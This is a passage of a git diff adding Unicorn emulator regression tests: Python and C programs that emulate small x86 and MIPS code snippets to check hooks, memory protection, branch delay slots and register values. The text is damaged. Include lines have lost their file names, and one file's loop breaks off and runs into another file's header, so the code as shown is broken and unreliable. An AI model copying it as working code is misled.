%rcx) + print(">>> RDX = %x" %rdx) + print(">>> RSI = %x" %rsi) + print(">>> RDI = %x" %rdi) + print(">>> R8 = %x" %r8) + print(">>> R9 = %x" %r9) + print(">>> R10 = %x" %r10) + print(">>> R11 = %x" %r11) + print(">>> R12 = %x" %r12) + print(">>> R13 = %x" %r13) + print(">>> R14 = %x" %r14) + print(">>> R15 = %x" %r15) + print(">>> ELAGS = %x" %eflags) + 
print "-"*11 + self.multipath() + print "-"*11 + + # callback for tracing memory access (READ or WRITE) + def hook_mem_access(self, uc, access, address, size, value, user_data): + if access == UC_MEM_WRITE: + print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ + %(address, size, value)) + else: # READ + print(">>> Memory is being READ at 0x%x, data size = %u" \ + %(address, size)) + + # callback for tracing invalid memory access (READ or WRITE) + def hook_mem_invalid(self, uc, access, address, size, value, user_data): + print("[ HOOK_MEM_INVALID - Address: %s ]" % hex(address)) + if access == UC_MEM_WRITE_UNMAPPED: + print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" %(address, size, value)) + return True + else: + print(">>> Missing memory is being READ at 0x%x, data size = %u, data value = 0x%x" %(address, size, value)) + return True + + + def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): + print("[ HOOK_MEM_FETCH - Address: %s ]" % hex(address)) + print("[ mem_fetch_unmapped: faulting address at %s ]" % hex(address).strip("L")) + return True + + def runTest(self): + global mu + + JUMP = "\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90" + + ADDRESS = 0x1000000 + + print("Emulate x86_64 code") + # Initialize emulator in X86-64bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, JUMP) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, self.hook_block) + + # tracing all instructions in range [ADDRESS, ADDRESS+0x60] + mu.hook_add(UC_HOOK_CODE, 
self.hook_code, None, ADDRESS, ADDRESS+0x60) + + # tracing all memory READ & WRITE access + mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access) + mu.hook_add(UC_HOOK_MEM_READ, self.hook_mem_access) + mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(JUMP)) + except UcError as e: + print("ERROR: %s" % e) + + rdx = mu.reg_read(UC_X86_REG_RDX) + self.assertEqual(rdx, 0xbabe, "RDX contains the wrong value. Eflags modification failed.") + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/leaked_refs.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/leaked_refs.py new file mode 100644 index 0000000..263345d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/leaked_refs.py @@ -0,0 +1,63 @@ +#!/usr/bin/python + +from __future__ import print_function + +import time + +from unicorn import * +from unicorn.x86_const import * + +import objgraph + +import regress + +ADDRESS = 0x8048000 +STACK_ADDRESS = 0xffff000 +STACK_SIZE = 4096 +''' +31 DB xor ebx, ebx +53 push ebx +43 inc ebx +53 push ebx +6A 02 push 2 +6A 66 push 66h +58 pop eax +89 E1 mov ecx, esp +CD 80 int 80h +''' +CODE = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80" +EP = ADDRESS + 0x54 + +def hook_code(mu, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + +def emu_loop(): + emu = Uc(UC_ARCH_X86, UC_MODE_32) + emu.mem_map(ADDRESS, 0x1000) + emu.mem_write(EP, CODE) + + emu.mem_map(STACK_ADDRESS, STACK_SIZE) + emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE) + + i = emu.hook_add(UC_HOOK_CODE, hook_code, None) + emu.hook_del(i) + + emu.emu_start(EP, EP + len(CODE), count = 3) + print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP)) + +def debugMem(): + 
import gc + gc.collect() # don't care about stuff that would be garbage collected properly + #print("Orphaned objects in gc.garbage:", gc.garbage) + assert(len(objgraph.by_type("Uc")) == 0) + #assert(len(objgraph.get_leaking_objects()) == 0) + +class EmuLoopReferenceTest(regress.RegressTest): + def runTest(self): + for i in range(5): + emu_loop() + debugMem() + + +if __name__ == '__main__': + regress.main() \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_crash.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_crash.c new file mode 100644 index 0000000..1d89d8d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_crash.c @@ -0,0 +1,32 @@ +#include +#include +#include +#include + +#define UC_BUG_WRITE_SIZE 13000 +#define UC_BUG_WRITE_ADDR 0x1000 + +int main() +{ + int size; + uint8_t *buf; + uc_engine *uc; + uc_err err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + fprintf (stderr, "Cannot initialize unicorn\n"); + return 1; + } + size = UC_BUG_WRITE_SIZE; + buf = malloc (size); + if (!buf) { + fprintf (stderr, "Cannot allocate\n"); + return 1; + } + memset (buf, 0, size); + if (!uc_mem_map (uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) { + uc_mem_write (uc, UC_BUG_WRITE_ADDR, buf, size); + } + uc_close(uc); + free(buf); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_write.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_write.c new file mode 100644 index 0000000..124e2d8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/map_write.c @@ -0,0 +1,54 @@ +#include +#include +#include + +#define ADDR 0x00400000 +#define SIZE 1024*64 +#define OVERFLOW 1 + +int main() +{ + uc_engine *uc = NULL; + uint8_t *buf = NULL, *buf2 = NULL; + int i; + uc_err err; + + err = uc_open (UC_ARCH_X86, UC_MODE_64, &uc); + if (err) { + printf ("uc_open %d\n", err); + goto exit; + } + err = uc_mem_map (uc, ADDR, SIZE, UC_PROT_ALL); 
+ if (err) { + printf ("uc_mem_map %d\n", err); + goto exit; + } + buf = calloc (SIZE*2, 1); + buf2 = calloc (SIZE, 1); + for (i=0;i +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#include "pthread.h" +#endif // _MSC_VER + +// common includes +#include + + +const uint64_t addr = 0x100000; +// This code SHOULD execute the instruction at 0x100010. +const unsigned char test_code_1[] = { + 0x00,0x00,0x04,0x24, // 100000: li $a0, 0 + 0x01,0x00,0x02,0x24, // 100004: li $v0, 1 + 0x02,0x00,0x03,0x24, // 100008: li $v1, 2 + 0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014 + 0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0 +}; +// This code SHOULD NOT execute the instruction at 0x100010. +const unsigned char test_code_2[] = { + 0x00,0x00,0x04,0x24, // 100000: li $a0, 0 + 0x01,0x00,0x02,0x24, // 100004: li $v0, 1 + 0x01,0x00,0x03,0x24, // 100008: li $v1, 1 + 0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014 + 0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0 +}; +int test_num = 0; +// flag for whether the delay slot was executed by the emulator +bool test1_delayslot_executed = false; +bool test2_delayslot_executed = false; +// flag for whether the delay slot had a code hook called for it +bool test1_delayslot_hooked = false; +bool test2_delayslot_hooked = false; + + +// This hook is used to show that code is executing in the emulator. 
+static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + printf("Test %d Executing: %"PRIx64"\n", test_num, address); + if( test_num == 1 && address == 0x100010 ) + { + printf("Delay slot hook called!\n"); + test1_delayslot_hooked = true; + } + if( test_num == 2 && address == 0x100010 ) + { + printf("Delay slot hook called!\n"); + test2_delayslot_hooked = true; + } +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook hhc; + uint32_t val; + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + printf("uc_open()\n"); + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + printf("uc_mem_map()\n"); + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + printf("uc_hook_add()\n"); + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + + // write test1 code to be emulated to memory + test_num = 1; + printf("\nuc_mem_write(1)\n"); + err = uc_mem_write(uc, addr, test_code_1, sizeof(test_code_1)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + // start executing test code 1 + printf("uc_emu_start(1)\n"); + uc_emu_start(uc, addr, addr+sizeof(test_code_1), 0, 0); + // read the value from a0 when finished executing + uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + if( val != 0 ) + test1_delayslot_executed = true; + + + // write test2 code to be emulated to memory + test_num = 2; + printf("\nuc_mem_write(2)\n"); + err = uc_mem_write(uc, 
addr, test_code_2, sizeof(test_code_2)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + // start executing test code 2 + printf("uc_emu_start(2)\n"); + uc_emu_start(uc, addr, addr+sizeof(test_code_2), 0, 0); + // read the value from a0 when finished executing + uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + if( val != 0 ) + test2_delayslot_executed = true; + + + // free resources + printf("\nuc_close()\n"); + uc_close(uc); + + + // print test results + printf("\n\nTest 1 SHOULD execute the delay slot instruction:\n"); + printf(" Emulator %s execute the delay slot: %s\n", + test1_delayslot_executed ? "did" : "did not", + test1_delayslot_executed ? "CORRECT" : "WRONG"); + printf(" Emulator %s hook the delay slot: %s\n", + test1_delayslot_hooked ? "did" : "did not", + test1_delayslot_hooked ? "CORRECT" : "WRONG"); + + printf("\n\nTest 2 SHOULD NOT execute the delay slot instruction:\n"); + printf(" Emulator %s execute the delay slot: %s\n", + test2_delayslot_executed ? "did" : "did not", + !test2_delayslot_executed ? "CORRECT" : "WRONG"); + printf(" Emulator %s hook the delay slot: %s\n", + test2_delayslot_hooked ? "did" : "did not", + !test2_delayslot_hooked ? 
"CORRECT" : "WRONG"); + + + // test 1 SHOULD execute the instruction in the delay slot + if( test1_delayslot_hooked == true && test1_delayslot_executed == true ) + printf("\n\nTEST 1 PASSED!\n"); + else + printf("\n\nTEST 1 FAILED!\n"); + + // test 2 SHOULD NOT execute the instruction in the delay slot + if( test2_delayslot_hooked == false && test2_delayslot_executed == false ) + printf("TEST 2 PASSED!\n\n"); + else + printf("TEST 2 FAILED!\n\n"); + + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_delay_slot_code_hook.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_delay_slot_code_hook.c new file mode 100644 index 0000000..4a407ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_delay_slot_code_hook.c @@ -0,0 +1,138 @@ +/* +Test for code hook being called for instructions in branch delay slot in MIPS cpu. +See issue https://github.com/unicorn-engine/unicorn/issues/290 + +The code hook should be called for every instruction executed. +This test checks that the code hook is correctly called for instructions in branch delay slots. +In this test the loop check value is decremented inside the branch delay shot. +This helps to show that the instruction in the branch delay slot is being executed, +but that the code hook is just not occurring. +*/ + +// windows specific +#ifdef _MSC_VER +#include +#include +#define PRIx64 "llX" +#ifdef DYNLOAD +#include +#else // DYNLOAD +#include +#ifdef _WIN64 +#pragma comment(lib, "unicorn_staload64.lib") +#else // _WIN64 +#pragma comment(lib, "unicorn_staload.lib") +#endif // _WIN64 +#endif // DYNLOAD + +// posix specific +#else // _MSC_VER +#include +#endif // _MSC_VER + +// common includes +#include + + +// Test MIPS little endian code. +// It should loop 3 times before ending. 
+const uint64_t addr = 0x100000; +const unsigned char loop_test_code[] = { + 0x02,0x00,0x04,0x24, // 100000: li $a0, 2 + // loop1 + 0x00,0x00,0x00,0x00, // 100004: nop + 0xFE,0xFF,0x80,0x14, // 100008: bnez $a0, loop1 + 0xFF,0xFF,0x84,0x24, // 10000C: addiu $a0, -1 +}; +bool test_passed_ok = false; +int loop_count = 0; + + +static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) +{ + if( address == 0x10000C ) + test_passed_ok = true; + if( address == 0x100004 ) + { + printf("\nloop %d:\n", loop_count); + loop_count++; + } + printf("Code: %"PRIx64"\n", address); +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_err err; + uc_hook hhc; + uint32_t val; + + // dynamically load shared library +#ifdef DYNLOAD + uc_dyn_load(NULL, 0); +#endif + + // Initialize emulator in MIPS 32bit little endian mode + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) + { + printf("Failed on uc_open() with error returned: %u\n", err); + return err; + } + + // map in a page of mem + err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); + if (err) + { + printf("Failed on uc_mem_map() with error returned: %u\n", err); + return err; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code)); + if( err ) + { + printf("Failed on uc_mem_write() with error returned: %u\n", err); + return err; + } + + // hook all instructions by having @begin > @end + uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); + if( err ) + { + printf("Failed on uc_hook_add(code) with error returned: %u\n", err); + return err; + } + + // execute code + printf("---- Executing Code ----\n"); + err = uc_emu_start(uc, addr, addr + sizeof(loop_test_code), 0, 0); + if (err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + return err; + } + + // done executing, print some reg values as a test + printf("---- Execution Complete 
----\n\n"); + uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); + uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); + + // free resources + uc_close(uc); + + if( test_passed_ok ) + printf("\n\nTEST PASSED!\n\n"); + else + printf("\n\nTEST FAILED!\n\n"); + + // dynamically free shared library +#ifdef DYNLOAD + uc_dyn_free(); +#endif + + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_except.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_except.py new file mode 100644 index 0000000..b400efe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_except.py @@ -0,0 +1,41 @@ +#!/usr/bin/python +from unicorn import * +from unicorn.mips_const import * + +import regress + +def hook_intr(uc, intno, _): + print 'interrupt', intno + +CODE = 0x400000 +asm = '0000a48f'.decode('hex') # lw $a0, ($sp) + +class MipsExcept(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + uc.hook_add(UC_HOOK_INTR, hook_intr) + uc.mem_map(CODE, 0x1000) + uc.mem_write(CODE, asm) + + with self.assertRaises(UcError) as m: + uc.reg_write(UC_MIPS_REG_SP, 0x400001) + uc.emu_start(CODE, CODE + len(asm), 300) + + self.assertEqual(UC_ERR_READ_UNALIGNED, m.exception.errno) + + with self.assertRaises(UcError) as m: + uc.reg_write(UC_MIPS_REG_SP, 0xFFFFFFF0) + uc.emu_start(CODE, CODE + len(asm), 200) + + self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno) + + with self.assertRaises(UcError) as m: + uc.reg_write(UC_MIPS_REG_SP, 0x80000000) + uc.emu_start(CODE, CODE + len(asm), 100) + + self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno) + +if __name__ == '__main__': + regress.main() + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_invalid_read_of_size_4_when_tracing.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_invalid_read_of_size_4_when_tracing.c new file mode 100644 index 0000000..013016e --- 
/dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_invalid_read_of_size_4_when_tracing.c @@ -0,0 +1,33 @@ +#include + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("tracing\n"); +} + +#define HARDWARE_ARCHITECTURE UC_ARCH_MIPS +#define HARDWARE_MODE UC_MODE_MIPS32 + +#define MEMORY_STARTING_ADDRESS 0x1000000 +#define MEMORY_SIZE 2 * 1024 * 1024 +#define MEMORY_PERMISSIONS UC_PROT_ALL + +#define BINARY_CODE "00000000000000000000000000AA" + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + 1); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kernel_mmu.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kernel_mmu.py new file mode 100644 index 0000000..51602fa --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kernel_mmu.py @@ -0,0 +1,24 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.mips_const import * + +import regress + +class MipsSyscall(regress.RegressTest): + def test(self): + addr = 0x80000000 + code = '34213456'.decode('hex') # ori $at, $at, 0x3456 + + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) + uc.mem_map(addr, 0x1000) + uc.mem_write(addr, code) + uc.reg_write(UC_MIPS_REG_AT, 0) + + uc.emu_start(addr, addr + len(code)) + + self.assertEqual(uc.reg_read(UC_MIPS_REG_AT), 
0x3456) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kseg0_1.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kseg0_1.c new file mode 100644 index 0000000..be47bf5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_kseg0_1.c @@ -0,0 +1,75 @@ +#include +#include +#include +#include + +// Test for the MIPS kseg0 and kseg1 memory segments. +// See issue https://github.com/unicorn-engine/unicorn/issues/217 +// The kseg0 address range 0x80000000-0x9FFFFFFF is not mapped through the MMU, +// but instead is directly translated to low ram by masking off the high address bit. +// Similarly, the address range kseg1 0xA00000000-0xBFFFFFF is translated directly to +// low ram by masking off the top 3 address bits. +// Qemu handles these address ranges correctly, but there are issues with the way Unicorn checks for +// a valid memory mapping when executing code in the kseg0 or kseg1 memory range. +// In particular, Unicorn checks for a valid mapping using the virtual address when executing from kseg0/1, +// when it should probably use the real address in low ram. 
+ +#define KSEG0_VIRT_ADDRESS 0x80001000 //Virtual address in kseg0, mapped by processor (and QEMU) to 0x1000 +#define KSEG1_VIRT_ADDRESS 0xA0001000 //Virtual address in kseg1, mapped by processor (and QEMU) to 0x1000 +#define KSEG0_1_REAL_ADDRESS 0x1000 //Real address corresponding to the above addresses in kseg0/1 + +#define MIPS_CODE_EL "\x56\x34\x21\x34" // ori $at, $at, 0x3456; + +int main() +{ + + uc_engine *uc; + uc_err err; + + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + // map 4Kb memory for this emulation, into the real address space + err = uc_mem_map(uc, KSEG0_1_REAL_ADDRESS, 4 * 1024, UC_PROT_ALL); + if (err) { + printf("uc_mem_map %d\n", err); + return 1; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, KSEG0_1_REAL_ADDRESS, MIPS_CODE_EL, sizeof(MIPS_CODE_EL) - 1); + if (err) { + printf("uc_mem_map %s\n", uc_strerror(err)); + return 1; + } + + //Start emulation at real address, this currently succeeds + err = uc_emu_start(uc, KSEG0_1_REAL_ADDRESS, KSEG0_1_REAL_ADDRESS + 4, 0, 0); + if (err) { + printf("uc_emu_start at real address: %s\n", uc_strerror(err)); + return 1; + } + + //Start emulation at virtual address in kseg0, this cuurently fails + err = uc_emu_start(uc, KSEG0_VIRT_ADDRESS, KSEG0_VIRT_ADDRESS + 4, 0, 0); + if (err) { + printf("uc_emu_start at kseg0 address: %s\n", uc_strerror(err)); + return 1; + } + + //Start emulation at virtual address in kseg1, this currently fails + err = uc_emu_start(uc, KSEG1_VIRT_ADDRESS, KSEG1_VIRT_ADDRESS + 4, 0, 0); + if (err) { + printf("uc_emu_start at kseg1 address: %s\n", uc_strerror(err)); + return 1; + } + + uc_close(uc); + + printf("Good, this bug is fixed!\n"); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_single_step_sp.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_single_step_sp.py new file mode 100644 index 0000000..b3c7840 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_single_step_sp.py @@ -0,0 +1,51 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.mips_const import * + +import regress + +def code_hook(uc, addr, size, user_data): + print 'code hook: pc=%08x sp=%08x' % (addr, uc.reg_read(UC_MIPS_REG_SP)) + +def run(step=False): + addr = 0x4010dc + + code = ( + 'f8ff0124' # addiu $at, $zero, -8 + '24e8a103' # and $sp, $sp, $at + '09f82003' # jalr $t9 + 'e8ffbd23' # addi $sp, $sp, -0x18 + 'b8ffbd27' # addiu $sp, $sp, -0x48 + '00000000' # nop + ).decode('hex') + + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + if step: + uc.hook_add(UC_HOOK_CODE, code_hook) + + uc.reg_write(UC_MIPS_REG_SP, 0x60800000) + uc.reg_write(UC_MIPS_REG_T9, addr + len(code) - 8) + + print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP)) + print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT)) + print ' (single step: %s)' % (str(step)) + + uc.mem_map(addr & ~(0x1000 - 1), 0x2000) + uc.mem_write(addr, code) + uc.emu_start(addr, addr + len(code)) + + print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP)) + print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT)) + print + return uc.reg_read(UC_MIPS_REG_SP) + + +class MipsSingleStep(regress.RegressTest): + def test(self): + sp1 = run(step=False) + sp2 = run(step=True) + self.assertEqual(sp1, sp2) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_syscall_pc.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_syscall_pc.py new file mode 100644 index 0000000..995b154 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mips_syscall_pc.py @@ -0,0 +1,27 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.mips_const import * + +import regress + +def intr_hook(uc, intno, data): + print 'interrupt=%d, v0=%d, pc=0x%08x' % (intno, uc.reg_read(UC_MIPS_REG_V0), uc.reg_read(UC_MIPS_REG_PC)) + +class MipsSyscall(regress.RegressTest): + def test(self): + addr = 
0x40000 + code = '0c000000'.decode('hex') # syscall + + uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + uc.mem_map(addr, 0x1000) + uc.mem_write(addr, code) + uc.reg_write(UC_MIPS_REG_V0, 100) + uc.hook_add(UC_HOOK_INTR, intr_hook) + + uc.emu_start(addr, addr+len(code)) + self.assertEqual(0x40004, uc.reg_read(UC_MIPS_REG_PC)) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/mov_gs_eax.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mov_gs_eax.py new file mode 100644 index 0000000..fe381eb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/mov_gs_eax.py @@ -0,0 +1,24 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + +class VldrPcInsn(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_X86, UC_MODE_32) + uc.mem_map(0x1000, 0x1000) + # mov gs, eax; mov eax, 1 + code = '8ee8b801000000'.decode('hex') + uc.mem_write(0x1000, code) + uc.reg_write(UC_X86_REG_EAX, 0xFFFFFFFF) + + with self.assertRaises(UcError) as ex_ctx: + uc.emu_start(0x1000, 0x1000 + len(code)) + + self.assertEquals(ex_ctx.exception.errno, UC_ERR_EXCEPTION) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/movsd.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/movsd.py new file mode 100644 index 0000000..2876613 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/movsd.py @@ -0,0 +1,35 @@ +#!/usr/bin/python +# By Ryan Hileman, issue #3 + +from capstone import * +from unicorn import * +from unicorn.x86_const import * + +import regress +code = 'f20f1005aa120000'.decode('hex') + +def dis(mem, addr): + md = Cs(CS_ARCH_X86, CS_MODE_64) + return '\n'.join([ + '%s %s' % (i.mnemonic, i.op_str) + for i in md.disasm(str(mem), addr) + ]) + +def hook_code(uc, addr, size, user_data): + mem = uc.mem_read(addr, size) + print 'instruction size:', size + print 
'instruction:', str(mem).encode('hex'), dis(mem, addr) + print 'reference: ', code.encode('hex'), dis(code, addr) + +class Movsd(regress.RegressTest): + + def runTest(self): + addr = 0x400000 + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.hook_add(UC_HOOK_CODE, hook_code) + mu.mem_map(addr, 8 * 1024 * 1024) + mu.mem_write(addr, code) + mu.emu_start(addr, addr + len(code)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/nr_mem_test.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/nr_mem_test.c new file mode 100644 index 0000000..34a8814 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/nr_mem_test.c @@ -0,0 +1,108 @@ +/* +Non-readable memory test case + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +#include + +#include + +const uint8_t PROGRAM[] = + "\x8b\x1d\x00\x00\x30\x00\xa1\x00\x00\x40\x00"; +// total size: 11 bytes + +/* +bits 32 + + mov ebx, [0x300000] + mov eax, [0x400000] +*/ + +// callback for tracing memory access (READ or WRITE) +static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) +{ + + switch(type) { + default: + // return false to indicate we want to stop emulation + return false; + case UC_MEM_READ_PROT: + printf(">>> non-readable memory is being read at 0x%"PRIx64 ", data size = %u\n", + address, size); + return false; + } +} + + +int main(int argc, char **argv, char **envp) +{ + uc_engine *uc; + uc_hook trace1; + uc_err err; + uint32_t eax, ebx; + + printf("Memory protections test\n"); + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u\n", err); + return 1; + } + + uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ); + uc_mem_map(uc, 0x300000, 0x1000, UC_PROT_READ | UC_PROT_WRITE); + uc_mem_map(uc, 0x400000, 0x1000, UC_PROT_WRITE); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) { 